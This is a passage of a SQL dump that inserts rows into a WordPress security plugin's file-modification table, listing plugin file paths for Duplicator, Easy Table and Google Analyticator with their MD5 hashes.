(0xfd1184b2530bc06076dfac5e37401cf1, 'wp-content/plugins/duplicator/installer/build/assets/inc.js.php', 1, 0x00000000000000000000000000000000, 0xaaedb71fff8b98927e75e517f43e87d4),
(0x04ceb048c3fce530ae1155ac26836085, 'wp-content/plugins/duplicator/installer/build/assets/inc.libs.css.php', 1, 0x00000000000000000000000000000000, 0xe63d3391f651a33e0f178bcfea797f7e),
(0x53e81a75a81cd3b0cd879a9e038751e1, 'wp-content/plugins/duplicator/installer/build/assets/inc.libs.js.php', 1, 0x00000000000000000000000000000000, 0xc2687bd96dfb170baa413d01943933eb),
(0x6aa0a5f722d785b4e5dcaa64699e1252, 'wp-content/plugins/duplicator/installer/build/classes/class.config.php', 1, 0x00000000000000000000000000000000, 0xe2a76ffa020434cca8b4fe7ec5b8b5ff),
(0xad11067a20cb8e3a42cc7e85f8d1e3a5, 'wp-content/plugins/duplicator/installer/build/classes/class.logging.php', 1, 0x00000000000000000000000000000000, 0x170d1ea5215e478ced24faf2da49e136),
(0x46596e92417a00fb9a10f61ccc3e514d, 'wp-content/plugins/duplicator/installer/build/classes/class.serializer.php', 1, 0x00000000000000000000000000000000, 0x31b928ac3672297fab3d70b1f0a3b8dc),
(0xea254e7b0e6b50fc52c8674930aa6c0d, 'wp-content/plugins/duplicator/installer/build/classes/class.utils.php', 1, 0x00000000000000000000000000000000, 0xc3b75b35faa7f41e21bcc8c5ceb20d38),
(0x61263fd541d407dbf5cfe2a8d6287e28, 'wp-content/plugins/duplicator/installer/build/main.installer.php', 1, 0x00000000000000000000000000000000, 0x99bea24c6df5dd1a3fa120b7be10a86f),
(0x35d2f132815bd24a38eeeaea7637bfd3, 'wp-content/plugins/duplicator/installer/build/view.help.php', 1, 0x00000000000000000000000000000000, 0x75b347bd773e9e7624619202bbd88f9a),
(0xd1f22a1ae5f14362d1b828eb96033345, 'wp-content/plugins/duplicator/installer/build/view.step0.php', 1, 0x00000000000000000000000000000000, 0x24e7fc565cd182e2496cecba3fbd5634),
(0xeed7986ea060550e4dd2b5a5d0ded8db, 'wp-content/plugins/duplicator/installer/build/view.step1.php', 1, 0x00000000000000000000000000000000, 0xaa5a2a8863b82aaaca39ef52623f64d2),
(0x49ea4b3b48853a808c9d2e82116fc221, 'wp-content/plugins/duplicator/installer/build/view.step2.php', 1, 0x00000000000000000000000000000000, 0x6317a32e3200e4f8f93805c9e0b9994b),
(0x5b2303f12e763a1d15e43c86250c540f, 'wp-content/plugins/duplicator/installer/build/view.step3.php', 1, 0x00000000000000000000000000000000, 0xc1fd4180864b7a467a8365f9e96b8a0e),
(0x2309aebd16eaa33997f82487ddb80417, 'wp-content/plugins/duplicator/installer/dtoken.php', 1, 0x00000000000000000000000000000000, 0xc6ae56de1c7b1269fba8ca589f7e9548),
(0xcbadbcea14c087617941f96eed6db49a, 'wp-content/plugins/duplicator/lang/wpduplicator-de_DE.mo', 1, 0x00000000000000000000000000000000, 0xb6711fcf98a22b1faa96fac57f0de992),
(0x8c2d63a3ad0e33ef799c4ce7d2ed80cd, 'wp-content/plugins/duplicator/lang/wpduplicator-de_DE.po', 1, 0x00000000000000000000000000000000, 0x21ca48b44805f1863fe933fd84702c59),
(0xab8380a2c255a1153c0fea353a297282, 'wp-content/plugins/duplicator/lang/wpduplicator-fr_FR.mo', 1, 0x00000000000000000000000000000000, 0xfc58bb2b0b1e8d81b83336694c06d870),
(0x2644b2b71fb236a6bab99a92e0b3e050, 'wp-content/plugins/duplicator/lang/wpduplicator-fr_FR.po', 1, 0x00000000000000000000000000000000, 0xf8ed8841361b76d5cab8d95976021d6f),
(0xcee50ec2ddf114321ec778da5914ad23, 'wp-content/plugins/duplicator/lang/wpduplicator.mo', 1, 0x00000000000000000000000000000000, 0x6ba6530918837ff2ce33d89bec38bd46),
(0xdf08f787d7d3f80c3974371374442559, 'wp-content/plugins/duplicator/lang/wpduplicator.po', 1, 0x00000000000000000000000000000000, 0x33d430c865c811a7aebd5e4a1b522ce2),
(0x75d74d09aa1a18a6ebcc442161512cc4, 'wp-content/plugins/duplicator/lang/wpduplicator.pot', 1, 0x00000000000000000000000000000000, 0x29712e96930d08e887ac1924858fffce),
(0x1b4c2795e4235451ad9a511dcc7ed7f3, 'wp-content/plugins/duplicator/readme.txt', 1, 0x00000000000000000000000000000000, 0x5f4fec61b39746ccb5cb0d8c8f8a80a5),
(0xf207dd1930e8a93149724246b848c532, 'wp-content/plugins/duplicator/uninstall.php', 1, 0x00000000000000000000000000000000, 0x97ccd900ce778e5229b41b9d1bb2eb64),
(0xa92b0180f2e084a0af18c9864957857b, 'wp-content/plugins/duplicator/views/actions.php', 1, 0x00000000000000000000000000000000, 0x0d9c7582e465f1596122118d34d5acc6);
INSERT INTO `www2_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x029fc39a359904c7b844c3ff9e81e9f5, 'wp-content/plugins/duplicator/views/help/about.php', 1, 0x00000000000000000000000000000000, 0x5125a942321223c7101e8907486329e6),
(0x437a063076fc713572bb2ae82de3a8e1, 'wp-content/plugins/duplicator/views/help/gopro.php', 1, 0x00000000000000000000000000000000, 0xb5b53a21fef63675f5895a3b6d4f06cd),
(0xdb99fa13a2b2e2ccb140a3c65e31c04c, 'wp-content/plugins/duplicator/views/help/help.php', 1, 0x00000000000000000000000000000000, 0x96dc1d9445c9a05c1fd7b73289927ae2),
(0x27bcfb48e94204c32f9f2c7cac6918bf, 'wp-content/plugins/duplicator/views/inc.header.php', 1, 0x00000000000000000000000000000000, 0xd2a55dd2b4dfa9dd14ec451c9d7abbb7),
(0xd04ce0f2ebb8fbae441d35320f8b5fb1, 'wp-content/plugins/duplicator/views/javascript.php', 1, 0x00000000000000000000000000000000, 0xd16e7f2c87a8346a7faccf6a5b6aec18),
(0x8eea4c659506245468e8599faadc9fcc, 'wp-content/plugins/duplicator/views/packages/controller.php', 1, 0x00000000000000000000000000000000, 0xd3eec7f8811dd237863130f77521a2a8),
(0x39b0c143ce03a6a7083f00ef7d51b0d2, 'wp-content/plugins/duplicator/views/packages/list-nodata.php', 1, 0x00000000000000000000000000000000, 0x429d03d46254b5b70ea75f6f43e4b552),
(0xf4012bcd2cf1c3f09bfdb58ae7cf00a3, 'wp-content/plugins/duplicator/views/packages/list.base.php', 1, 0x00000000000000000000000000000000, 0x67f09cc672bdc836768b0001f9b3bd64),
(0x03a85ba4185d8021828ff5b0aed059f4, 'wp-content/plugins/duplicator/views/packages/new1.base.php', 1, 0x00000000000000000000000000000000, 0x1c151a686c70190d64390987257259a4),
(0x13c4f277c12f4043ed2a62add6bc978f, 'wp-content/plugins/duplicator/views/packages/new1.inc.form.php', 1, 0x00000000000000000000000000000000, 0x75f662f420883b5b93d8358913aec360),
(0x119949b379eafa5ec182728b38de630e, 'wp-content/plugins/duplicator/views/packages/new2.base.php', 1, 0x00000000000000000000000000000000, 0xdce43b270d12c4b80abbc175fcf78823),
(0xcb2dd9cc5e5d707719119e18d4ec77c1, 'wp-content/plugins/duplicator/views/packages/new3.base.php', 1, 0x00000000000000000000000000000000, 0x96829edc5bd3697084dc2c9ee19a25c9),
(0xa2686aacef811ecc9fd88201708275e8, 'wp-content/plugins/duplicator/views/settings/controller.php', 1, 0x00000000000000000000000000000000, 0x234b75d07151e897c261a3bbe7102653),
(0x1e9d3abfb971d7c6428306f712eee27f, 'wp-content/plugins/duplicator/views/settings/general.php', 1, 0x00000000000000000000000000000000, 0x97a07b6936786f86335b1c2021d5e835),
(0x89f5c9da9dcd1f0926ef28ffa42157f7, 'wp-content/plugins/duplicator/views/tools/cleanup.php', 1, 0x00000000000000000000000000000000, 0x39ecc57553d242f82afc5145809e1ec9),
(0x778bd91d43b8874fca78b7df239b296e, 'wp-content/plugins/duplicator/views/tools/controller.php', 1, 0x00000000000000000000000000000000, 0xf611aead97d7ef35243bcaaeb3953fce),
(0x9ade2c92282b84d81c51e139a9720896, 'wp-content/plugins/duplicator/views/tools/diagnostics.php', 1, 0x00000000000000000000000000000000, 0x431c5d392622053262db2e7697c24977),
(0x1081236552d0e6c77e5b19f9e2ce0929, 'wp-content/plugins/duplicator/views/tools/logging.php', 1, 0x00000000000000000000000000000000, 0xd15f2686a58c17b09f55f6b80b31a706),
(0xedd48be8609cb2f1f850727e1846c5f8, 'wp-content/plugins/easy-table/css/admin-style.css', 1, 0x00000000000000000000000000000000, 0x8d9bd715d1cd769df8177819dcdbacf4),
(0x2b2cb2bc8f5547d6db862cbd49e00814, 'wp-content/plugins/easy-table/css/easy-table.css', 1, 0x00000000000000000000000000000000, 0x64fc0627bb8adaaf418079c094b239c5),
(0x80e526380f239f38948124ea507326f4, 'wp-content/plugins/easy-table/css/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x2c894e879bf1456b975262f4cddcfc15, 'wp-content/plugins/easy-table/easy-table.php', 1, 0x00000000000000000000000000000000, 0xee03e38edcbf9d1123dd04bb79971151),
(0x2524b9a560cb24d3837d5ce709cb7557, 'wp-content/plugins/easy-table/images/asc.gif', 1, 0x00000000000000000000000000000000, 0xf8a1940c9cf44ab8870319169f3a14ff),
(0xbcf0e7d429faf932d7b56035c1fb6756, 'wp-content/plugins/easy-table/images/bg.gif', 1, 0x00000000000000000000000000000000, 0xc01ad2e7c59d1a20a433cb873c21bd88),
(0xd42c9a3bbab56d44d534d0c3117e8af6, 'wp-content/plugins/easy-table/images/desc.gif', 1, 0x00000000000000000000000000000000, 0xa54846803de3cc786eec3d69f9ac2d38),
(0x0c12fc5eaf2a3fb747a5506f4bfae2f5, 'wp-content/plugins/easy-table/images/icon-table.png', 1, 0x00000000000000000000000000000000, 0x7bb65f5c51b27e8a14b9eb5b6318a53d),
(0x2e85d6bd4133a58f363d4e8ed86d0187, 'wp-content/plugins/easy-table/images/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x6a0484d89090da3952906f82b445caf1, 'wp-content/plugins/easy-table/inc/Encoding.php', 1, 0x00000000000000000000000000000000, 0xf4ab5e5312b93afd6d14ed7ca5e14992),
(0xe54dfa8fd95cf2907901cdddac7d9b4f, 'wp-content/plugins/easy-table/inc/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x79e4ea24a8848289faca930b7b0e2c9d, 'wp-content/plugins/easy-table/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x8f12ce5707e042cb5e2adcc066e8c315, 'wp-content/plugins/easy-table/js/easy-table-script.js', 1, 0x00000000000000000000000000000000, 0xc1b7eef641c5b2057d4d686cff1999be),
(0xb70d35b3a5426448212277c003846bf7, 'wp-content/plugins/easy-table/js/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x9dcb4a90dd6b6e10fc914acafcae30c0, 'wp-content/plugins/easy-table/js/ttooltip/script/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x1fc84564481775a0d8bf14cc413943f4, 'wp-content/plugins/easy-table/js/ttooltip/script/jquery-ttooltip.js', 1, 0x00000000000000000000000000000000, 0xc09a89c66f1971107445b0b5cbc378c0),
(0x04848049e3df60dff32767e2adf0c0c5, 'wp-content/plugins/easy-table/js/ttooltip/script/jquery-ttooltip.min.js', 1, 0x00000000000000000000000000000000, 0x6d398b08d03f0430625f8f8dd6de854c),
(0x87e00f5c37fd71fa9b275b88e206604f, 'wp-content/plugins/easy-table/js/ttooltip/style/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x591ab33ad04ea5088dcd024521583901, 'wp-content/plugins/easy-table/js/ttooltip/style/jquery-ttooltip.css', 1, 0x00000000000000000000000000000000, 0x36d22c1adfd37887d72f013037d539df),
(0x91aa290b67eebf78389c57962628178d, 'wp-content/plugins/easy-table/languages/easy-table-id_ID.mo', 1, 0x00000000000000000000000000000000, 0xc8a14472d1ede4571eaea5698cb3d90d),
(0xc3d9426b44f0d3663f411a01ce8c0554, 'wp-content/plugins/easy-table/languages/easy-table-id_ID.po', 1, 0x00000000000000000000000000000000, 0xa39cd2fabc6e9907f984e7177b635ff4),
(0xa858d67af2998795c269982273b54e1f, 'wp-content/plugins/easy-table/languages/english.mo', 1, 0x00000000000000000000000000000000, 0x698d624d2c1f893d89343e921035fa89),
(0xc114b924e22d4452b012c4713d552b75, 'wp-content/plugins/easy-table/languages/english.po', 1, 0x00000000000000000000000000000000, 0xb3a7a8cf209b0f0d2207f075110de442),
(0xcd4bee91d4a7633bd10d302f7f1d5739, 'wp-content/plugins/easy-table/languages/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x4086436c668668d9a9f81b48e452d73c, 'wp-content/plugins/easy-table/readme.txt', 0, 0x2a18dd644d6feeff9ccd27a886ee971a, 0x2a18dd644d6feeff9ccd27a886ee971a),
(0x3bdc3ccb38b3317905a90732b9c170a5, 'wp-content/plugins/easy-table/themes/cuscosky/style.css', 1, 0x00000000000000000000000000000000, 0x21b64d3c1a06e9af500f0560cfba7115),
(0xa40860e54064a89de23d81837ea06a24, 'wp-content/plugins/easy-table/themes/default/style.css', 1, 0x00000000000000000000000000000000, 0xb01bdc80d67c5a80663cfeab7a15b3ab),
(0xe555a3049f932a700f9c4717661b7dfe, 'wp-content/plugins/easy-table/themes/index.html', 1, 0x00000000000000000000000000000000, 0xd41d8cd98f00b204e9800998ecf8427e),
(0x28b6418ac054ca9dd2c3e1ab8aa2a4b3, 'wp-content/plugins/easy-table/themes/minimal/style.css', 1, 0x00000000000000000000000000000000, 0x747ddad0d01af921d0f05caf7f4cd8cc),
(0x26dfb791d23dd60c0141c9661260659f, 'wp-content/plugins/google-analyticator/class.analytics.stats.php', 1, 0x00000000000000000000000000000000, 0x4a137ffd191a5c4a0e989c60e71a10f2),
(0x10f4cb710c30f73fff595c77237ec1ba, 'wp-content/plugins/google-analyticator/download-button.png', 1, 0x00000000000000000000000000000000, 0xe0f9a10bd807fe97bd1eabef32897695),
(0x2b4312496feda27996e980eedb4dda3c, 'wp-content/plugins/google-analyticator/external-tracking.js', 1, 0x00000000000000000000000000000000, 0x94b8fd063d5ea00de45d7a5a8da26570),
(0xd6dc5e43648fe300486fc51322e0d9e9, 'wp-content/plugins/google-analyticator/external-tracking.min.js', 1, 0x00000000000000000000000000000000, 0x7e1385d5819f26c37f29f33a8eccc7e2),
(0x19d809f425ffd8ee957bca09a92de655, 'wp-content/plugins/google-analyticator/ga-md-ad-532.png', 1, 0x00000000000000000000000000000000, 0x0cbd5872997b9717540af59b36650cee),
(0xc6611689a04c3726a9bb702014e1877f, 'wp-content/plugins/google-analyticator/ga-plugin-advert-sidebar.png', 1, 0x00000000000000000000000000000000, 0x441cc3ef40408081730b926dba39a537),
(0x412fa77bae13782de2bd84bce3e07151, 'wp-content/plugins/google-analyticator/ga-plugin-advert.jpg', 1, 0x00000000000000000000000000000000, 0xab5dc5f5191b6651571cfb4f6f70a004),
(0x6263eb076b8302d1ab6317ab4a1e7a3a, 'wp-content/plugins/google-analyticator/ga_logo.png', 1, 0x00000000000000000000000000000000, 0x1fab927cfeed244580a18c736836ecd6),
(0x853d34d4cc2a7e76b6b1a5e486169572, 'wp-content/plugins/google-analyticator/gapro-plugin-advert-sidebar.png', 1, 0x00000000000000000000000000000000, 0xa11f0fd10757e4c941918bc4ceba3dfb),
(0xc6a2e89f0bfc63ecd32fd0111729af0a, 'wp-content/plugins/google-analyticator/google-analyticator.php', 1, 0x00000000000000000000000000000000, 0xb6a100af8c8382161f1e989006a2657f),
(0xbcb7755f7c86c8e821ef594c3db81261, 'wp-content/plugins/google-analyticator/google-analytics-stats-widget.php', 1, 0x00000000000000000000000000000000, 0x60abf55ead0276c7765d7c0ad5db8aac),
(0xb503c77a4c28010a6c26409d31ca1999, 'wp-content/plugins/google-analyticator/google-analytics-summary-widget.php', 1, 0x00000000000000000000000000000000, 0x17bdaa2445ffb85f29618b906c2d0635),
(0xf216bd80a6fab522150ecadda47b543f, 'wp-content/plugins/google-analyticator/google-api-php-client/src/Google_Client.php', 0, 0x7b85279df4c0d845415c97a579df614e, 0x7b85279df4c0d845415c97a579df614e),
(0x3bdd83b2f6cbd00358a5f72df0fa9e18, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_AssertionCredentials.php', 0, 0x19ec1a0bc3ffdeb07083e225f3e0ac7b, 0x19ec1a0bc3ffdeb07083e225f3e0ac7b),
(0x2a22e7cdf3c2ae5c070457b33b09f2d4, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_Auth.php', 0, 0x15873dc9c390eadbd5da2c0297062d7c, 0x15873dc9c390eadbd5da2c0297062d7c),
(0xc424559d985dd63e49b0d6ec5ee44b03, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_AuthNone.php', 0, 0x093b237c59e2e085a97e664c0ce88ebe, 0x093b237c59e2e085a97e664c0ce88ebe),
(0x24abdd7261727ed7c9d97d4a583796a8, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_LoginTicket.php', 0, 0x4397ba773564c0c73f32ae118c24b5d2, 0x4397ba773564c0c73f32ae118c24b5d2),
(0xdd9f2308f142f83ab0df9162d2f32eb1, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_OAuth2.php', 0, 0x39f54796674f476271ce8d5c05c9ec71, 0x39f54796674f476271ce8d5c05c9ec71),
(0xfddb5fe9d20c25de1293388a597c7481, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_P12Signer.php', 0, 0xe33e570503ed42cf7d25dd6c32d67263, 0xe33e570503ed42cf7d25dd6c32d67263),
(0xadf066e3219bacc3abd3c942b9bb3234, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_PemVerifier.php', 0, 0xe9fb745bc98981953a270e0374e77e58, 0xe9fb745bc98981953a270e0374e77e58),
(0x02405c5f9fae57a3195aa9c03de78390, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_Signer.php', 0, 0xb89eb963b836860aa622c2111915e5ac, 0xb89eb963b836860aa622c2111915e5ac),
(0x8476e00e618be847e0923fecc2b46ff9, 'wp-content/plugins/google-analyticator/google-api-php-client/src/auth/Google_Verifier.php', 0, 0x08c9de305f4824c6d94d7c40bfe7be58, 0x08c9de305f4824c6d94d7c40bfe7be58),
(0x57fadf6290a92eee7f6e6860e44e1554, 'wp-content/plugins/google-analyticator/google-api-php-client/src/cache/Google_ApcCache.php', 0, 0x38942168cb94c15a9064aa8faa6c1817, 0x38942168cb94c15a9064aa8faa6c1817),
(0xd2389f0d3e2111f08ef2614c663d3536, 'wp-content/plugins/google-analyticator/google-api-php-client/src/cache/Google_Cache.php', 0, 0x98c92b5d919c9143e68230e612298a9b, 0x98c92b5d919c9143e68230e612298a9b),
(0x1c218a7afd6b496d5343babc975680b2, 'wp-content/plugins/google-analyticator/google-api-php-client/src/cache/Google_FileCache.php', 0, 0x7cb3f047c1e3774474de8e8b2f5bd638, 0x7cb3f047c1e3774474de8e8b2f5bd638),
(0x14aeb8cf484daf99aa5240859405ba74, 'wp-content/plugins/google-analyticator/google-api-php-client/src/cache/Google_MemcacheCache.php', 0, 0x48f2b20eb2481b40954d0a7a130fa766, 0x48f2b20eb2481b40954d0a7a130fa766),
(0x7399f7303b86a66c24942008b12c587e, 'wp-content/plugins/google-analyticator/google-api-php-client/src/config.php', 0, 0x036fcb86e5358565d2844620fe9ba4b1, 0x036fcb86e5358565d2844620fe9ba4b1),
(0x8c2680ec3b5069145b8e44026376a0dd, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_AdexchangebuyerService.php', 0, 0xfcd6af83603120d00412c315fec93186, 0xfcd6af83603120d00412c315fec93186),
(0xbf289572f6fbe4cf06f7cd7814e69d3e, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_AdsenseService.php', 0, 0x46a03ecf85100740f30d284a07eb54eb, 0x46a03ecf85100740f30d284a07eb54eb),
(0xebcc0aafa7fbaf30376ed13fed9420c2, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_AdsensehostService.php', 0, 0x8b6a5cd3244cf84c6b33e111570d0d7f, 0x8b6a5cd3244cf84c6b33e111570d0d7f),
(0x46adee3894b1e87f27fc3a55c6370a97, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_AnalyticsService.php', 0, 0xebac87fabc96f512e2fde8b8514aec71, 0xebac87fabc96f512e2fde8b8514aec71),
(0x4ef568aefdc764b96da5f48819852a8b, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_BigqueryService.php', 0, 0x52cdc203a5959b43c6a8a69b9cb16f45, 0x52cdc203a5959b43c6a8a69b9cb16f45),
(0x00f463d910b11afac8f3d5cf08d6a090, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_BloggerService.php', 0, 0x65336d21d58f8f2c983246b2a768064c, 0x65336d21d58f8f2c983246b2a768064c),
(0xa994fca6909aa9bfed45735e02fb88e2, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_BooksService.php', 0, 0x1d3ea79436b063f95f1b1995217ff105, 0x1d3ea79436b063f95f1b1995217ff105),
(0x25fde56fd249a349d32e3128420291ec, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_CalendarService.php', 0, 0x1828cfdabcded687997e5cad9999b4bb, 0x1828cfdabcded687997e5cad9999b4bb),
(0x40ee60cc858ebcbb22a717bf771be2a0, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_ComputeService.php', 0, 0xfb9b77fb21dcd4b0482bff282a19d890, 0xfb9b77fb21dcd4b0482bff282a19d890),
(0x83a14192914fb556040f89499e9b6b9d, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_CustomsearchService.php', 0, 0x71e240765a29ee901ad1f5f30a7164e6, 0x71e240765a29ee901ad1f5f30a7164e6),
(0xbe53a959715b32f19b39063f5378ea3b, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_DriveService.php', 0, 0x49689e610b50e54ffb37fc09bb7bcf31, 0x49689e610b50e54ffb37fc09bb7bcf31),
(0xfce830dfa2137e3892056f17045895b1, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_FreebaseService.php', 0, 0xeb53801d59a2edd1c16e5c5b33fba221, 0xeb53801d59a2edd1c16e5c5b33fba221),
(0xddee22daf87b55370457412a33b83521, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_FusiontablesService.php', 0, 0x2e484e55d79e219246a7ef8f56dfd5ee, 0x2e484e55d79e219246a7ef8f56dfd5ee),
(0xd6113ebed759e9932a1e81ecb33ff923, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_GanService.php', 0, 0x78df9910ea63e74f3225678f364712d9, 0x78df9910ea63e74f3225678f364712d9),
(0x58e160c58f0a4b532f1182e373882d97, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_LatitudeService.php', 0, 0x165096ab7a3a8b05f97ea3a3f02d28d6, 0x165096ab7a3a8b05f97ea3a3f02d28d6),
(0x4beae045af3422481f73c70a6815e164, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_LicensingService.php', 0, 0x8f55c323fb03447bab1b7403fd4ab2f6, 0x8f55c323fb03447bab1b7403fd4ab2f6),
(0x17b2decda396068cebbd84a83c87537b, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_ModeratorService.php', 0, 0xf20f92b05539441192ccf98ef0d6cc90, 0xf20f92b05539441192ccf98ef0d6cc90),
(0xc3040c5cd47cfae1c1e80881e9325829, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_Oauth2Service.php', 0, 0x9273a2ae188738ccd091017212495197, 0x9273a2ae188738ccd091017212495197),
(0x220c0e32341baa0e9fb8d5a2b4f6fbe9, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_OrkutService.php', 0, 0xd0cd466c78cd9c8dcd1e0cfef384696b, 0xd0cd466c78cd9c8dcd1e0cfef384696b),
(0x4f8aab7f6423a2bef6240fa205bd6851, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_PagespeedonlineService.php', 0, 0xb73efb6889f190c4aeb01758f8cfc43a, 0xb73efb6889f190c4aeb01758f8cfc43a),
(0x02b26d84b769292e94b86919538331b0, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_PlusMomentsService.php', 0, 0xa4455c8ef47558346a85d2e47588146a, 0xa4455c8ef47558346a85d2e47588146a),
(0xe891a1b1f768a812aaa3c316ddf99cb3, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_PlusService.php', 0, 0xc7853657af310fa339f9aa70ff056b00, 0xc7853657af310fa339f9aa70ff056b00),
(0xf1700ca02fdea41bc8296faefbed183a, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_PredictionService.php', 0, 0x2c4739a3ef181178eb4f76f9ab2d56f6, 0x2c4739a3ef181178eb4f76f9ab2d56f6),
(0x3a7e034a6e1d24822de244d3c1b50deb, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_ShoppingService.php', 0, 0x3dbda05eb3f7f8baa7f0188a0a391eac, 0x3dbda05eb3f7f8baa7f0188a0a391eac),
(0x7e58fabaf2307b501440b45d9ebb9d98, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_SiteVerificationService.php', 0, 0x9792e2bbe628fdae91dbfae35c00df14, 0x9792e2bbe628fdae91dbfae35c00df14),
(0x6124ef5cdbc9db8a9fa13e4b8964ba90, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_StorageService.php', 0, 0x51b240f63170d0c0dd27a2c6e435ddbe, 0x51b240f63170d0c0dd27a2c6e435ddbe),
(0x1ea2bdb3c5a6bff961658b1528a6ba02, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_TaskqueueService.php', 0, 0xe34f538ffc1e2e412431e85c7cdec662, 0xe34f538ffc1e2e412431e85c7cdec662),
(0xcadbb6946854c2d35c723ece044cda22, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_TasksService.php', 0, 0x3065ef4ba7b95317e149191432cb8440, 0x3065ef4ba7b95317e149191432cb8440),
(0x666faf3c354d484d9777b88e97fdf50f, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_TranslateService.php', 0, 0x5dc38b483a051aab0ded6c327beb0025, 0x5dc38b483a051aab0ded6c327beb0025),
(0x5d59218ffca69c9e5747a76416a3781e, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_UrlshortenerService.php', 0, 0xef4fe776c3fa2324dde4afbe0494f979, 0xef4fe776c3fa2324dde4afbe0494f979),
(0xf9e3735f96524f694e44f004e5c39ef9, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_WebfontsService.php', 0, 0x04260525d97d2a1701821eced43fd96e, 0x04260525d97d2a1701821eced43fd96e),
(0x1e9a13b756c41b38c001c4dec0b37c6c, 'wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_YoutubeService.php', 0, 0x61d96013596c3d94a3388682fb085e29, 0x61d96013596c3d94a3388682fb085e29),
(0x7922aa6d77f226bbd2028560f1f2ddbd, 'wp-content/plugins/google-analyticator/google-api-php-client/src/external/URITemplateParser.php', 0, 0xab16c229beb014fd4a99e5c095ef6ac7, 0xab16c229beb014fd4a99e5c095ef6ac7),
(0xf1986a8e6b05e6ea520a4f9ba68210cb, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/Google_CacheParser.php', 0, 0xa8524de4f95bc1d237a7bf22dd3dfb8a, 0xa8524de4f95bc1d237a7bf22dd3dfb8a),
(0x20c369d949cb16fe2746b374c83e0dbd, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/Google_CurlIO.php', 0, 0x9f5d2871c87ba61cced0efab8c57d4dc, 0x9f5d2871c87ba61cced0efab8c57d4dc),
(0xd087464761fb82ce621c19c63c94d8f2, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/Google_HttpRequest.php', 0, 0x01f22c8d762d21fd7c93d4d60737b041, 0x01f22c8d762d21fd7c93d4d60737b041),
(0xac4095e53b720d374605d0557e239a33, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/Google_IO.php', 0, 0x872ddfd60a5ef638517ef81c7c0b6b95, 0x872ddfd60a5ef638517ef81c7c0b6b95),
(0x0b71d23d2a5b6fc15e916f8f18ed9a50, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/Google_REST.php', 0, 0xe0b7abd2292576c5b087b8ddbc5c66b6, 0xe0b7abd2292576c5b087b8ddbc5c66b6),
(0xf24362270641dedc4a28971eb6ac1d30, 'wp-content/plugins/google-analyticator/google-api-php-client/src/io/cacerts.pem', 0, 0x2dc185f345f7ca634aec690243f346d8, 0x2dc185f345f7ca634aec690243f346d8),
(0xc4cb43e94afa4d55964c9a668d533f8b, 'wp-content/plugins/google-analyticator/google-api-php-client/src/local_config.php', 0, 0x50e52c5e49cd7a889b09304f2d823877, 0x50e52c5e49cd7a889b09304f2d823877),
(0xd125b85c0ed10d4952454c79a6191e8a, 'wp-content/plugins/google-analyticator/google-api-php-client/src/service/Google_BatchRequest.php', 0, 0x3c5f95b98e16d1a4a3fe2cc5cf48e9b6, 0x3c5f95b98e16d1a4a3fe2cc5cf48e9b6),
